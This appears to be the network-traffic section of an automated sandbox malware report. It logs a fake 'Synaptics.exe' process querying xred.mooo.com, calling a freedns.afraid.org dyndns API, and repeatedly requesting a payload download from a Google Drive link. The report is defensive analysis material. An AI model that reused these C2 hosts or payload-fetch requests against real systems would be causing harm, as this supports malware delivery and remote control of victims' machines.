                                                                                        Dec 5, 2024 22:52:04.307271957 CET4435007413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:04.307332993 CET4435007413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:04.307383060 CET50074443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:04.307638884 CET50074443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:04.307657003 CET4435007413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:04.307672024 CET50074443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:04.307676077 CET4435007413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:04.310509920 CET50079443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:04.310555935 CET4435007913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:04.310631990 CET50079443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:04.310772896 CET50079443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:04.310790062 CET4435007913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:04.651575089 CET4435007513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:04.654800892 CET4435007513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:04.654860020 CET50075443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:04.654938936 CET50075443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:04.654967070 CET4435007513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:04.654994965 CET50075443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:04.655002117 CET4435007513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:04.657947063 CET50080443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:04.657987118 CET4435008013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:04.658293962 CET50080443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:04.658447027 CET50080443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:04.658458948 CET4435008013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:04.904876947 CET4435007613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:04.905409098 CET50076443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:04.905445099 CET4435007613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:04.905970097 CET50076443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:04.905975103 CET4435007613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:04.957921028 CET4435007713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:04.958386898 CET50077443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:04.958411932 CET4435007713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:04.958807945 CET50077443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:04.958812952 CET4435007713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:05.339149952 CET4435007613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:05.342858076 CET4435007613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:05.342926979 CET50076443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:05.343007088 CET50076443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:05.343029022 CET4435007613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:05.343043089 CET50076443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:05.343046904 CET4435007613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:05.345837116 CET50081443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:05.345874071 CET4435008113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:05.346172094 CET50081443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:05.346311092 CET50081443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:05.346324921 CET4435008113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:05.393269062 CET4435007713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:05.393337965 CET4435007713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:05.393515110 CET50077443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:05.393553972 CET50077443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:05.393570900 CET4435007713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:05.393579960 CET50077443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:05.393584967 CET4435007713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:05.396248102 CET50082443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:05.396291971 CET4435008213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:52:05.396361113 CET50082443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:05.396512985 CET50082443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:05.396528006 CET4435008213.107.246.63192.168.2.5

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 5, 2024 22:50:07.040992975 CET5623953192.168.2.51.1.1.1
                                                                                        Dec 5, 2024 22:50:07.181075096 CET53562391.1.1.1192.168.2.5
                                                                                        Dec 5, 2024 22:50:07.932706118 CET6212153192.168.2.51.1.1.1
                                                                                        Dec 5, 2024 22:50:08.249334097 CET53621211.1.1.1192.168.2.5
                                                                                        Dec 5, 2024 22:50:08.253122091 CET5113953192.168.2.51.1.1.1
                                                                                        Dec 5, 2024 22:50:08.564068079 CET53511391.1.1.1192.168.2.5
                                                                                        Dec 5, 2024 22:50:10.049166918 CET5622153192.168.2.51.1.1.1
                                                                                        Dec 5, 2024 22:50:10.191699028 CET53562211.1.1.1192.168.2.5
                                                                                        Dec 5, 2024 22:50:12.187232971 CET6484453192.168.2.51.1.1.1
                                                                                        Dec 5, 2024 22:50:12.325803041 CET53648441.1.1.1192.168.2.5
                                                                                        Dec 5, 2024 22:50:19.129041910 CET6034853192.168.2.51.1.1.1
                                                                                        Dec 5, 2024 22:50:19.267833948 CET53603481.1.1.1192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.093583107 CET5992453192.168.2.51.1.1.1
                                                                                        Dec 5, 2024 22:50:26.231931925 CET53599241.1.1.1192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.765558004 CET5512553192.168.2.51.1.1.1
                                                                                        Dec 5, 2024 22:50:30.904238939 CET53551251.1.1.1192.168.2.5
                                                                                        Dec 5, 2024 22:50:36.702737093 CET5080753192.168.2.51.1.1.1
                                                                                        Dec 5, 2024 22:50:36.841111898 CET53508071.1.1.1192.168.2.5
                                                                                        Dec 5, 2024 22:50:41.546648026 CET5637353192.168.2.51.1.1.1
                                                                                        Dec 5, 2024 22:50:41.684202909 CET53563731.1.1.1192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.376653910 CET5043753192.168.2.51.1.1.1
                                                                                        Dec 5, 2024 22:50:47.514719963 CET53504371.1.1.1192.168.2.5

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Dec 5, 2024 22:50:07.040992975 CET192.168.2.51.1.1.10x6060Standard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                        Dec 5, 2024 22:50:07.932706118 CET192.168.2.51.1.1.10x3d9bStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                        Dec 5, 2024 22:50:08.253122091 CET192.168.2.51.1.1.10x7b62Standard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                        Dec 5, 2024 22:50:10.049166918 CET192.168.2.51.1.1.10x290cStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                        Dec 5, 2024 22:50:12.187232971 CET192.168.2.51.1.1.10xba5dStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                        Dec 5, 2024 22:50:19.129041910 CET192.168.2.51.1.1.10x55a6Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                        Dec 5, 2024 22:50:26.093583107 CET192.168.2.51.1.1.10x9560Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                        Dec 5, 2024 22:50:30.765558004 CET192.168.2.51.1.1.10xd596Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                        Dec 5, 2024 22:50:36.702737093 CET192.168.2.51.1.1.10x1906Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                        Dec 5, 2024 22:50:41.546648026 CET192.168.2.51.1.1.10xf1c9Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                        Dec 5, 2024 22:50:47.376653910 CET192.168.2.51.1.1.10x7c87Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Dec 5, 2024 22:50:07.181075096 CET1.1.1.1192.168.2.50x6060No error (0)docs.google.com172.217.19.238A (IP address)IN (0x0001)false
                                                                                        Dec 5, 2024 22:50:08.249334097 CET1.1.1.1192.168.2.50x3d9bName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 5, 2024 22:50:08.564068079 CET1.1.1.1192.168.2.50x7b62No error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                                        Dec 5, 2024 22:50:10.191699028 CET1.1.1.1192.168.2.50x290cNo error (0)drive.usercontent.google.com142.250.181.129A (IP address)IN (0x0001)false
                                                                                        Dec 5, 2024 22:50:12.325803041 CET1.1.1.1192.168.2.50xba5dName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 5, 2024 22:50:16.994992018 CET1.1.1.1192.168.2.50x903bNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 5, 2024 22:50:16.994992018 CET1.1.1.1192.168.2.50x903bNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                        Dec 5, 2024 22:50:19.267833948 CET1.1.1.1192.168.2.50x55a6Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 5, 2024 22:50:26.231931925 CET1.1.1.1192.168.2.50x9560Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 5, 2024 22:50:30.904238939 CET1.1.1.1192.168.2.50xd596Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 5, 2024 22:50:36.841111898 CET1.1.1.1192.168.2.50x1906Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 5, 2024 22:50:41.684202909 CET1.1.1.1192.168.2.50xf1c9Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 5, 2024 22:50:47.514719963 CET1.1.1.1192.168.2.50x7c87Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 5, 2024 22:51:11.659380913 CET1.1.1.1192.168.2.50x7dbeNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 5, 2024 22:51:11.659380913 CET1.1.1.1192.168.2.50x7dbeNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • docs.google.com
                                                                                        • drive.usercontent.google.com
                                                                                        • otelrules.azureedge.net
                                                                                        • freedns.afraid.org

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.54971269.42.215.252802180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 5, 2024 22:50:08.685381889 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                        User-Agent: MyApp
                                                                                        Host: freedns.afraid.org
                                                                                        Cache-Control: no-cache
                                                                                        Dec 5, 2024 22:50:09.931361914 CET243INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Thu, 05 Dec 2024 21:50:09 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        X-Cache: MISS
                                                                                        Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1fERROR: Could not authenticate.0


                                                                                        HTTPS Proxied Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.549707172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:09 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:10 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:09 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-OMBAkMraEfB3H-cJDUjsJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.549708172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:09 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:10 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:09 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-W4ZlpSj_Nirp-_3H0UF9XA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.549721172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:13 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:13 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:13 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-JjpzRVbiclJ8NZWTh0B8fQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.549720172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:13 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:13 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:13 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-d7PGA60vWaQSb5Pg52Jnyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.549728172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:15 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:16 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:16 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-nTrC4M6xPUeauRVS_dJ2PQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.549729172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:15 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:16 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:16 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce--ALrmlUBccNVJYAR0kT8Yg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.549730142.250.181.1294432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:15 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-12-05 21:50:16 UTC1605INHTTP/1.1 404 Not Found
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:16 GMT
                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-aLUGkF0k6MmCTjeOuZBoTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Length: 1652
                                                                                        X-GUploader-UploadID: AFiumC75Oc9nohzsmgWCW86BmmFlPezwFx3l5ROzFFZKSMwbzIPs5yjtYANnUrdXrdZqHPbpc8488J9Nbw
                                                                                        Server: UploadServer
                                                                                        Set-Cookie: NID=519=XAK-F-xT7EjeEQabmLXL3lyU7QzNh7EJ4EZ7QA0BOToG-xr5be7_Rh7oIUvEkfgRfufMwAslLXQCTczVKHZ5PNTjQd0D2eR5hjAiAkGYaCfmIbfcr8C6ZcLlgOUE6RPDg9koF4oy0R-5waNi_sTkf4O5c-frZCUvXEFXbRYaOcZwVnQYSGonaj3Y; expires=Fri, 06-Jun-2025 21:50:16 GMT; path=/; domain=.google.com; HttpOnly
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
